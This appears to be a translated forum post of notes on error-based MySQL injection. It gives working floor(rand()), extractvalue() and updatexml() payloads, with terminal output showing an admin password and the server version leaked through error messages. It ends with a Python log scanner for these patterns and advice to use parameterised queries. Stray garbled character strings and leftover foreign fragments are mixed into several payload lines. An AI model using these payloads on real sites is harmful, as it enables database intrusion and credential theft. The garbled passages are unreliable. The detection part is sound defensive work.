Posting some of my old notes. When MySQL executes a statement it throws error messages, and sites built on PHP + MySQL often display the raw error on the page, so the three methods below can be constructed to extract specific data from those errors.
Actual test environment:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()
The following payloads can be used (the group-by collision on floor(rand(0)*2) forces a duplicate-key error whose message carries the concatenated value):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
+ G" c; |$ Q+ q5 G. o. K. L举例如下:; S8 H% i6 R+ j, A6 F
首先进行正常查询:
! Y! X! C! k$ u& L
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As you can see, the MySQL version is leaked in the error message. To retrieve other data, replace the version() expression with the desired subquery.
For example, to retrieve the admin username and password:
Method 1:
6 T) _" z( G5 n! z- g/ ?" Lmysql> select * from article where id = 1 and (select 1 from
( n$ c5 q+ [% S9 ^. P(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x4 d" V4 j( y1 L* s/ h
from information_schema.tables group by x)a);% p9 |/ D( W4 Z2 C) C6 Y) a
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'$ Q, K$ D( v: K0 g) x
Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement (extractvalue() raises an XPath syntax error that echoes the malformed expression, here the 0x5c backslash followed by the subquery result):

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test process:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c, (select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement (updatexml() behaves the same way; 0x5e24 is the "^$" delimiter that marks the result in the error text):

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test process:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
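As an added example (not from the original post), here is a small Python scanner that flags all three error-based patterns above in web-server access logs, run over constructed sample lines; the Apache-style log format and the URL encoding of the requests are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Keyword signatures for the extractvalue()/updatexml() techniques and for
# information_schema enumeration; the floor() technique needs two parts.
SIGNATURES = {
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
    "information_schema": re.compile(r"\binformation_schema\."),
}
FLOOR_RAND = re.compile(r"\bfloor\s*\(\s*rand\s*\(")
GROUP_BY = re.compile(r"\bgroup\s+by\b")

# Constructed sample access-log lines (assumed Apache combined format); the
# three injected requests carry the payloads from the notes, URL-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2010:10:00:00 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2010:10:00:01 +0000] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 301',
    '10.0.0.9 - - [01/Jan/2010:10:00:02 +0000] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20table_name%20from%20information_schema.tables%20limit%201))) HTTP/1.1" 500 290',
    '10.0.0.9 - - [01/Jan/2010:10:00:03 +0000] "GET /article.php?id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20user()),0x5e24),1)) HTTP/1.1" 500 280',
]

def normalize(query_string):
    """URL-decode twice (catches double encoding), drop /* */ comments,
    collapse whitespace and lowercase, so the regexes see plain SQL."""
    s = unquote_plus(unquote_plus(query_string))
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s).lower()

def scan_request(line):
    """Return the signature names matched by one access-log line."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
    if not m:
        return []
    text = normalize(m.group(1).partition("?")[2])
    found = [name for name, rx in SIGNATURES.items() if rx.search(text)]
    # The floor() trick only matters when rand() feeds a GROUP BY.
    if FLOOR_RAND.search(text) and GROUP_BY.search(text):
        found.insert(0, "floor_rand_groupby")
    return found

def scan_log(lines):
    """Return (line_number, signatures) for every request that matched."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = scan_request(line)
        if found:
            hits.append((n, found))
    return hits

if __name__ == "__main__":
    for n, hit in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hit)}")
```

A hit on a request that also returned HTTP 500 is a strong sign the page is echoing MySQL errors; the fix on the application side is parameterised queries plus display_errors off in php.ini.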
All, thanks foreign guys.